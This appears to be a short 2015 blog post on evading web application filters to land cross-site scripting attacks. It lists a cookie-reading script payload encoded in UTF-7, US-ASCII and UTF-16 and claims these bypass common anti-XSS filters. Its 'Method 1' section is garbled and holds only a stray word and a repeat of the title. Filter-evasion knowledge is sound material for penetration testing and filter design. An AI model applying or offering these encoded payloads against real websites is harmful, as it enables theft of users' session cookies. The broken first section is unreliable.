Kartier Pohs

Friday, August 14, 2015

XSS WEB APPLICATION FILTERS BYPASS

Sometimes when we use our payload for xss in any of the input area or in url parameters,it results in unsuccessful attack vector because website itself use filters for these type of malicious attack vectors.So in this case we need to bypass these filters.Here is a list of methods which is useful to bypass these types of filters.
Bypassing using Character Sets:-

Method 1 :-

Undesirability:- 
XSS WEB APPLICATION FILTERS BYPASS



Method 2:-

In some situations, you can employ a powerful means of bypassing many types
of filters by causing the application to accept a nonstandard encoding of your
attack payload. The following examples show some representations of the string
<script>alert(document.cookie)</script> in alternative character sets:


UTF-7
+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-


US-ASCII
BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; ¼script¾alert(do
63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F ; cument.cookie)¼/
73 63 72 69 70 74 BE ; script¾


UTF-16
FF FE 3C 00 73 00 63 00 72 00 69 00 70 00 74 00 ; ÿþ<.s.c.r.i.p.t.
3E 00 61 00 6C 00 65 00 72 00 74 00 28 00 64 00 ; >.a.l.e.r.t.(.d.
6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 2E 00 ; o.c.u.m.e.n.t...
63 00 6F 00 6F 00 6B 00 69 00 65 00 29 00 3C 00 ; c.o.o.k.i.e.).<.
2F 00 73 00 63 00 72 00 69 00 70 00 74 00 3E 00 ; /.s.c.r.i.p.t.>.

These encoded strings will bypass many common anti-XSS filters ;)

1 comment:

Copyright 2015 @ Yogesh Prasad